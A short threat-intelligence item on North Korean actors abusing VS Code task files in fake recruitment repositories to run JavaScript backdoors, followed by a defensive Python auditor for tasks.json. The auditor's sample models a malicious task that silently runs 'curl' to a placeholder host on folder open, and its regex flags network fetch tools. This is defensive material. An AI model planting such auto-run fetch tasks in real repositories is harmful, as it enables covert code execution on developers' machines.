Threat Actors Expand Abuse of Microsoft Visual Studio Code

released on 2026-01-21 @ 12:38:22 PM
North Korean threat actors have evolved their techniques in the Contagious Interview campaign, now abusing Microsoft Visual Studio Code task configuration files. The infection chain begins when a victim opens a malicious Git repository, often disguised as part of a recruitment process. If trust is granted, arbitrary commands are executed on the system. The malware uses JavaScript payloads hosted on vercel.app to implement backdoor logic, including remote code execution, system fingerprinting, and persistent command-and-control communication. The backdoor collects host information and beacons to a C2 server every five seconds. Recent observations show further execution of similar payloads, indicating ongoing development of these tactics.
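
A defender-side check for the task-file abuse described above, as an added example that is not part of the original article: it audits a repository's `.vscode/tasks.json` before the folder is trusted. It assumes the auto-run trigger is VS Code's `runOptions.runOn: "folderOpen"` setting, which the article does not name; the function names, heuristics and sample file are constructed for illustration.

```python
import json
import re

# Heuristic only: commands that pull content from the network deserve a look.
NETWORK_HINT = re.compile(r"https?://|\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)
# Matches a string literal first, so "//" inside a URL is never taken for a comment.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text):
    """Drop // and /* */ comments but keep string literals intact."""
    return TOKEN.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

def audit_tasks(text):
    """Return [(label, [reasons])] for tasks worth reviewing before trusting a folder."""
    # Hand-edited JSONC often has trailing commas; drop them so json.loads accepts it.
    doc = json.loads(re.sub(r",(\s*[}\]])", r"\1", strip_jsonc(text)))
    findings = []
    for task in doc.get("tasks", []):
        reasons = []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically on folder open")
        # Per-OS blocks can override the command, so check them too.
        variants = [task] + [task[k] for k in ("windows", "linux", "osx") if isinstance(task.get(k), dict)]
        for v in variants:
            cmdline = " ".join(str(p) for p in [v.get("command", ""), *v.get("args", [])])
            if NETWORK_HINT.search(cmdline):
                reasons.append("fetches remote content: " + cmdline.strip())
        if (task.get("presentation") or {}).get("reveal") == "never":
            reasons.append("hides the task terminal")
        if reasons:
            findings.append((task.get("label", "<unlabelled>"), reasons))
    return findings

# Constructed sample for illustration, not taken from a real repository.
SAMPLE = """{
  // tasks.json allows comments
  "version": "2.0.0",
  "tasks": [
    {"label": "setup", "type": "shell",
     "command": "curl -s https://placeholder.example.invalid/setup",
     "runOptions": {"runOn": "folderOpen"},
     "presentation": {"reveal": "never"},},
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]}
  ]
}"""

if __name__ == "__main__":
    print(audit_tasks(SAMPLE))
```

Run it over the file contents of any cloned repository before answering the workspace trust prompt; an empty result means only that these heuristics found nothing, not that the tasks are safe.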